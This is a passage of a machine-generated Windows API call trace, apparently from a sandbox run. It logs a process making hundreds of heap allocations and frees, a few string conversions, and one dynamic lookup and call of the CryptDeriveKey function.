[0158.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4708 [0158.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac270 | out: hHeap=0x25c0000) returned 1 [0158.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac270 [0158.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b57c0 [0158.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2078 [0158.146] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0158.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b57c0 | out: hHeap=0x25c0000) returned 1 [0158.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac0f0 [0158.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0158.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2078 [0158.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2718 [0158.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac090 [0158.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac210 [0158.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2758 [0158.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac108 [0158.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2758 | out: hHeap=0x25c0000) returned 1 [0158.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2758 [0158.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b57c0 [0158.147] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0158.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b57c0 | out: hHeap=0x25c0000) returned 1 [0158.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2758 | out: hHeap=0x25c0000) returned 1 [0158.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac108 | out: hHeap=0x25c0000) returned 1 [0158.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac210 | out: hHeap=0x25c0000) returned 1 [0158.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac090 | out: hHeap=0x25c0000) returned 1 [0158.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2718 | out: hHeap=0x25c0000) returned 1 [0158.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0158.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0158.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2078 [0158.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2718 [0158.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac090 [0158.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac210 [0158.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2758 [0158.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac108 [0158.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2758 | out: hHeap=0x25c0000) returned 1 [0158.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac108 | out: hHeap=0x25c0000) returned 1 [0158.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac210 | out: hHeap=0x25c0000) returned 1 [0158.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac090 | out: hHeap=0x25c0000) returned 1 [0158.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2718 | out: hHeap=0x25c0000) returned 1 [0158.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0158.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac0f0 | out: hHeap=0x25c0000) returned 1 [0158.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac0f0 [0158.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac090 [0158.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac210 [0158.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac108 [0158.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac198 [0158.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0158.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4708 | out: hHeap=0x25c0000) returned 1 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac078 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1b0 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac120 [0158.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac138 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab088 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac1c8 [0158.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abe20 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2688 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac168 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abee0 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2078 [0158.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abf40 [0158.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf40 | out: hHeap=0x25c0000) returned 1 [0158.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abee0 | out: hHeap=0x25c0000) returned 1 [0158.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac168 | out: hHeap=0x25c0000) returned 1 [0158.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2688 [0158.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac168 [0158.150] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abee0 [0158.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2078 [0158.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2718 [0158.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abf40 [0158.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abee0 | out: hHeap=0x25c0000) returned 1 [0158.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf40 | out: hHeap=0x25c0000) returned 1 [0158.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2718 | out: hHeap=0x25c0000) returned 1 [0158.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abf40 [0158.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2718 [0158.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abee0 [0158.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2078 [0158.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2758 [0158.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abd90 [0158.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abee0 | out: hHeap=0x25c0000) returned 1 [0158.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abd90 | out: hHeap=0x25c0000) returned 1 [0158.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2758 | out: hHeap=0x25c0000) returned 1 [0158.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2758 [0158.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abd90 [0158.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2078 [0158.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b26a8 [0158.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abee0 [0158.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abd90 | out: hHeap=0x25c0000) returned 1 [0158.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abee0 | out: hHeap=0x25c0000) returned 1 [0158.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b26a8 | out: hHeap=0x25c0000) returned 1 [0158.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b26a8 [0158.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abee0 [0158.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2078 [0158.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b26d8 [0158.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abd90 [0158.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abee0 | out: hHeap=0x25c0000) returned 1 [0158.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abd90 | out: hHeap=0x25c0000) returned 1 [0158.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b26d8 | out: hHeap=0x25c0000) returned 1 [0158.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b26d8 [0158.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abd90 [0158.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2078 [0158.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13b8 [0158.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abee0 [0158.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abd90 | out: hHeap=0x25c0000) returned 1 [0158.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abee0 | out: hHeap=0x25c0000) returned 1 [0158.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13b8 | out: hHeap=0x25c0000) returned 1 [0158.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4708 [0158.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf40 | out: hHeap=0x25c0000) returned 1 [0158.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13b8 [0158.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abf40 [0158.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2078 [0158.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2628 [0158.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abee0 [0158.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf40 | out: hHeap=0x25c0000) returned 1 [0158.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abee0 | out: hHeap=0x25c0000) returned 1 [0158.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2628 | out: hHeap=0x25c0000) returned 1 [0158.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abee0 [0158.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2628 [0158.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0158.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xf) returned 0x24abf40 [0158.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24abf40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0158.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf40 | out: hHeap=0x25c0000) returned 1 [0158.153] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0158.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abee0 | out: hHeap=0x25c0000) returned 1 [0158.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2628 | out: hHeap=0x25c0000) returned 1 [0158.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0158.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2628 [0158.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2078 [0158.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2728 [0158.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2768 [0158.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2778 [0158.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2628 | out: hHeap=0x25c0000) returned 1 [0158.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2078 | out: hHeap=0x25c0000) returned 1 [0158.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2728 | out: hHeap=0x25c0000) returned 1 [0158.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2768 | out: hHeap=0x25c0000) returned 1 [0158.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2778 | out: hHeap=0x25c0000) returned 1 [0158.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0158.153] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa55e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa56a0) returned 1 [0158.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0158.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0158.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2778 [0158.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abee0 [0158.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abf40 [0158.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abd90 [0158.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2768 [0158.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abd90 | out: hHeap=0x25c0000) returned 1 [0158.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2768 | out: hHeap=0x25c0000) returned 1 [0158.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abf40 | out: hHeap=0x25c0000) returned 1 [0158.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abf40 [0158.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abd90 [0158.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac030 [0158.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2768 [0158.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac030 | out: hHeap=0x25c0000) returned 1 [0158.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2768 | out: hHeap=0x25c0000) returned 1 [0158.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abd90 | out: hHeap=0x25c0000) returned 1 [0158.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abd90 [0158.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac030 [0158.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abfe8 [0158.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2768 [0158.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abfe8 | out: hHeap=0x25c0000) returned 1 [0158.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2768 | out: hHeap=0x25c0000) returned 1 [0158.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac030 | out: hHeap=0x25c0000) returned 1 [0158.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac030 [0158.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abfe8 [0158.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac2a0 [0158.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2768 [0158.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac2a0 | out: hHeap=0x25c0000) returned 1 [0158.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2768 | out: hHeap=0x25c0000) returned 1 [0158.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abfe8 | out: hHeap=0x25c0000) returned 1 [0158.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abfe8 [0158.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac2a0 [0158.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac288 [0158.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2768 [0158.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac288 | out: hHeap=0x25c0000) returned 1 [0158.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2768 | out: hHeap=0x25c0000) returned 1 [0158.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac2a0 | out: hHeap=0x25c0000) returned 1 [0158.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac2a0 [0158.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac288 [0158.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac258 [0158.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2768 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac258 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2768 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac288 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2718 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2758 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b26a8 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b26d8 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13b8 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4708 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac168 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2688 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac2b8 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1f8 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac240 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac228 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1e0 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac060 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abe50 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac270 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac090 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac0f0 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac210 | out: hHeap=0x25c0000) returned 1 [0158.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac198 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac108 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac078 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac120 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1b0 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac138 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac1c8 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab088 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24abe20 | out: hHeap=0x25c0000) returned 1 [0158.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 